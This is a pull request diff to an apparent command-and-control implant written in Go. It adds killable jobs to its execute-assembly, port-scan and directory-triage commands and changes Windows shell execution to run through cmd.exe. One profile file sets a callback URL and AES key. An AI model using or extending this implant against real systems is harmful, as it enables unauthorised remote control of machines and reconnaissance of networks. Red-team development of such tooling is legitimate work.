### PR TITLE
Jobs

### DIFF
--- a/README.md
+++ b/README.md
@@ -53,3 +53,12 @@ execute-assembly    Execute a .NET assembly.
 | portscan | &#9745; | &#9745; | &#9745; |
 | getprivs | &#9745; |  |  |
 | execute-assembly | &#9745; |  |  |
+| jobs | &#9745; | &#9745; | &#9745; |
+| jobkill | &#9745; | &#9745; | &#9745; |
+
+## Killable Jobs
+
+Due to the way Go-routines function, it's difficult if not impossible to kill them. As a result, only certain long-running tasks are able to receive a "kill" signal. The current list of killable jobs are:
+- `executeassembly`
+- `triagedirectory`
+- `portscan`

--- a/pkg/commands/executeassembly/executeassembly.go
+++ b/pkg/commands/executeassembly/executeassembly.go
@@ -38,7 +38,9 @@ func Run(args *Arguments, tMsg *structs.ThreadMsg, threadChannel chan<- structs.
 
 	// log.Println(fmt.Sprintf("From RUN, channel is: 0x%08d", tMsg.TaskItem.JobKillChan))
 	result, err := executeassembly(&args.AssemblyBytes, &args.Arguments, tMsg.TaskItem.Job)
-
+	if tMsg.TaskItem.Job.Monitoring {
+		go tMsg.TaskItem.Job.SendKill()
+	}
 	if err != nil {
 		// log.Println("Execute assembly returned error:", err.Error())
 		tMsg.TaskResult = []byte(err.Error())

--- a/pkg/commands/executeassembly/executeassembly.go
+++ b/pkg/commands/executeassembly/executeassembly.go
@@ -2,6 +2,8 @@ package executeassembly
 
 import (
 	"encoding/json"
+	"fmt"
+	"log"
 
 	"github.com/xorrior/poseidon/pkg/utils/structs"
 )
@@ -36,9 +38,11 @@ func Run(args *Arguments, tMsg *structs.ThreadMsg, threadChannel chan<- structs.
 		loaderAssembly = args.LoaderBytes
 	}
 
-	result, err := executeassembly(&args.AssemblyBytes, &args.Arguments)
+	log.Println(fmt.Sprintf("From RUN, channel is: 0x%08d", tMsg.TaskItem.JobKillChan))
+	result, err := executeassembly(&args.AssemblyBytes, &args.Arguments, tMsg.TaskItem.JobKillChan)
 
 	if err != nil {
+		log.Println("Execute assembly returned error:", err.Error())
 		tMsg.TaskResult = []byte(err.Error())
 		tMsg.Error = true
 		threadChannel <- *tMsg

--- a/pkg/commands/executeassembly/executeassembly.go
+++ b/pkg/commands/executeassembly/executeassembly.go
@@ -2,8 +2,6 @@ package executeassembly
 
 import (
 	"encoding/json"
-	"fmt"
-	"log"
 
 	"github.com/xorrior/poseidon/pkg/utils/structs"
 )
@@ -38,11 +36,11 @@ func Run(args *Arguments, tMsg *structs.ThreadMsg, threadChannel chan<- structs.
 		loaderAssembly = args.LoaderBytes
 	}
 
-	log.Println(fmt.Sprintf("From RUN, channel is: 0x%08d", tMsg.TaskItem.JobKillChan))
-	result, err := executeassembly(&args.AssemblyBytes, &args.Arguments, tMsg.TaskItem.JobKillChan)
+	// log.Println(fmt.Sprintf("From RUN, channel is: 0x%08d", tMsg.TaskItem.JobKillChan))
+	result, err := executeassembly(&args.AssemblyBytes, &args.Arguments, tMsg.TaskItem.Job)
 
 	if err != nil {
-		log.Println("Execute assembly returned error:", err.Error())
+		// log.Println("Execute assembly returned error:", err.Error())
 		tMsg.TaskResult = []byte(err.Error())
 		tMsg.Error = true
 		threadChannel <- *tMsg

--- a/pkg/commands/executeassembly/executeassembly_darwin.go
+++ b/pkg/commands/executeassembly/executeassembly_darwin.go
@@ -1,8 +1,12 @@
 // +build darwin
 package executeassembly
 
-import "errors"
+import (
+	"errors"
 
-func executeassembly(assembly *[]byte, params *string, jobKillChan chan<- int) (AssemblyOutput, error) {
+	"github.com/xorrior/poseidon/pkg/utils/structs"
+)
+
+func executeassembly(assembly *[]byte, params *string, job *structs.Job) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for darwin.")
 }

--- a/pkg/commands/executeassembly/executeassembly_darwin.go
+++ b/pkg/commands/executeassembly/executeassembly_darwin.go
@@ -3,6 +3,6 @@ package executeassembly
 
 import "errors"
 
-func executeassembly(assembly *[]byte, params *string) (AssemblyOutput, error) {
+func executeassembly(assembly *[]byte, params *string, jobKillChan *chan<- int) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for darwin.")
 }

--- a/pkg/commands/executeassembly/executeassembly_darwin.go
+++ b/pkg/commands/executeassembly/executeassembly_darwin.go
@@ -3,6 +3,6 @@ package executeassembly
 
 import "errors"
 
-func executeassembly(assembly *[]byte, params *string, jobKillChan *chan<- int) (AssemblyOutput, error) {
+func executeassembly(assembly *[]byte, params *string, jobKillChan chan<- int) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for darwin.")
 }

--- a/pkg/commands/executeassembly/executeassembly_linux.go
+++ b/pkg/commands/executeassembly/executeassembly_linux.go
@@ -3,6 +3,6 @@ package executeassembly
 
 import "errors"
 
-func executeassembly(assembly *[]byte, params *string, jobKillChan *chan<- int) (AssemblyOutput, error) {
+func executeassembly(assembly *[]byte, params *string, jobKillChan chan<- int) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for linux.")
 }

--- a/pkg/commands/executeassembly/executeassembly_linux.go
+++ b/pkg/commands/executeassembly/executeassembly_linux.go
@@ -1,8 +1,12 @@
 // +build linux
 package executeassembly
 
-import "errors"
+import (
+	"errors"
 
-func executeassembly(assembly *[]byte, params *string, jobKillChan chan<- int) (AssemblyOutput, error) {
+	"github.com/xorrior/poseidon/pkg/utils/structs"
+)
+
+func executeassembly(assembly *[]byte, params *string, job *structs.Job) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for linux.")
 }

--- a/pkg/commands/executeassembly/executeassembly_linux.go
+++ b/pkg/commands/executeassembly/executeassembly_linux.go
@@ -3,6 +3,6 @@ package executeassembly
 
 import "errors"
 
-func executeassembly(assembly *[]byte, params *string) (AssemblyOutput, error) {
+func executeassembly(assembly *[]byte, params *string, jobKillChan *chan<- int) (AssemblyOutput, error) {
 	return AssemblyOutput{}, errors.New("Not implemented for linux.")
 }

--- a/pkg/commands/jobkill/jobkill.go
+++ b/pkg/commands/jobkill/jobkill.go
@@ -1,0 +1,5 @@
+package jobkill
+
+type Arguments struct {
+	ID string `json:"id"`
+}

--- a/pkg/commands/portscan/portscan.go
+++ b/pkg/commands/portscan/portscan.go
@@ -110,6 +110,9 @@ func Run(task structs.Task, threadChannel chan<- structs.ThreadMsg) {
 	portStrings := strings.Split(params.Ports, ",")
 	// log.Println("Beginning portscan...")
 	results := doScan(params.Hosts, portStrings, task.Job)
+	if task.Job.Monitoring {
+		go task.Job.SendKill()
+	}
 	// log.Println("Finished!")
 	data, err := json.MarshalIndent(results, "", "    ")
 	// // fmt.Println("Data:", string(data))

--- a/pkg/commands/portscan/scanutils.go
+++ b/pkg/commands/portscan/scanutils.go
@@ -9,6 +9,7 @@ import (
 	"sync"
 	"time"
 
+	"github.com/xorrior/poseidon/pkg/utils/structs"
 	"golang.org/x/sync/semaphore"
 )
 
@@ -168,9 +169,12 @@ func (server *host) ScanPortRanges(portList []PortRange, waitTime time.Duration)
 	}
 }
 
-func (cidrRange *CIDR) ScanHosts(portList []PortRange, waitTime time.Duration) {
+func (cidrRange *CIDR) ScanHosts(portList []PortRange, waitTime time.Duration, job *structs.Job) {
 	wg := sync.WaitGroup{}
 	for i := 0; i < len(cidrRange.Hosts); i++ {
+		if *job.Stop > 0 {
+			break
+		}
 		server := cidrRange.Hosts[i]
 		wg.Add(1)
 		go func(server *host, portList []PortRange, waitTime time.Duration) {

--- a/pkg/commands/shell/shell_windows.go
+++ b/pkg/commands/shell/shell_windows.go
@@ -4,6 +4,7 @@ package shell
 
 import (
 	"errors"
+	"fmt"
 	"os/exec"
 
 	"github.com/google/shlex"
@@ -26,17 +27,13 @@ func (d *WindowsShell) Response() []byte {
 }
 
 func shellExec(c string) (Shell, error) {
-
+	c = fmt.Sprintf("cmd.exe /c %s", c)
 	args, _ := shlex.Split(c)
-	if len(args) == 0 {
+	if len(args) < 3 {
 		return nil, errors.New("Not enough arguments given for shell command.")
 	}
-	var cmd *exec.Cmd
-	if len(args) == 1 {
-		cmd = exec.Command(args[0])
-	} else {
-		cmd = exec.Command(args[0], args[1:]...)
-	}
+
+	cmd := exec.Command(args[0], args[1:]...)
 
 	r := &WindowsShell{}
 

--- a/pkg/commands/triagedirectory/triagedirectory.go
+++ b/pkg/commands/triagedirectory/triagedirectory.go
@@ -66,6 +66,10 @@ func Run(task structs.Task, threadChannel chan<- structs.ThreadMsg) {
 	result := NewDirectoryTriageResult()
 	go task.Job.MonitorStop()
 	err := triageDirectory(task.Params, result, task.Job)
+	// If it didn't end prematurely, send the kill.
+	if task.Job.Monitoring {
+		go task.Job.SendKill()
+	}
 	// fmt.Println(result)
 	if err != nil {
 		// fmt.Println("Error was not nil!", err.Error())

--- a/pkg/profiles/profile.go
+++ b/pkg/profiles/profile.go
@@ -9,10 +9,10 @@ import (
 )
 
 var (
-	UUID                         = "8003c39e-f967-4981-adf0-d42e09a3202a"
+	UUID                         = "UUID"
 	ExchangeKeyString            = "T"
-	AesPSK                       = "oLRANTsFUwT6Lz85rfz05YVS8ugreGizo1bHtWDyRsY="
-	BaseURL                      = "http://192.168.193.140:9000/"
+	AesPSK                       = "AESPSK"
+	BaseURL                      = "http(s)://callback_host:callback_port/"
 	BaseURLs                     = []string{}
 	UserAgent                    = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3" // Change this value
 	Sleep                        = 10

--- a/pkg/profiles/profile.go
+++ b/pkg/profiles/profile.go
@@ -9,10 +9,10 @@ import (
 )
 
 var (
-	UUID                         = "UUID"
+	UUID                         = "8003c39e-f967-4981-adf0-d42e09a3202a"
 	ExchangeKeyString            = "T"
-	AesPSK                       = "AESPSK"
-	BaseURL                      = "http(s)://callback_host:callback_port/"
+	AesPSK                       = "oLRANTsFUwT6Lz85rfz05YVS8ugreGizo1bHtWDyRsY="
+	BaseURL                      = "http://192.168.193.140:9000/"
 	BaseURLs                     = []string{}
 	UserAgent                    = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3" // Change this value
 	Sleep                        = 10

--- a/pkg/utils/structs/definitions.go
+++ b/pkg/utils/structs/definitions.go
@@ -18,6 +18,14 @@ type ThreadMsg struct {
 
 // Task used to define a task received from apfell
 type Task struct {
+	Command     string     `json:"command"`
+	Params      string     `json:"params"`
+	ID          string     `json:"id"`
+	JobKillChan chan (int) `json:""`
+}
+
+// TaskStub to post list of currently processing tasks.
+type TaskStub struct {
 	Command string `json:"command"`
 	Params  string `json:"params"`
 	ID      string `json:"id"`


### PR DESCRIPTION
Creates a job killing architecture for long-running or stoppable tasks in the agent. Each `Task` now has a `Job` structure associated with it that contains a kill channel. When the channel receives a signal, we set the flag for the executing loop to break.

You'll also need to register these "killable" jobs from the main.go page that checks the IDs are proper. We may want to consider setting variables for these integers for each task instead of just adding them as one-offs, but I did this only for exit and none commands.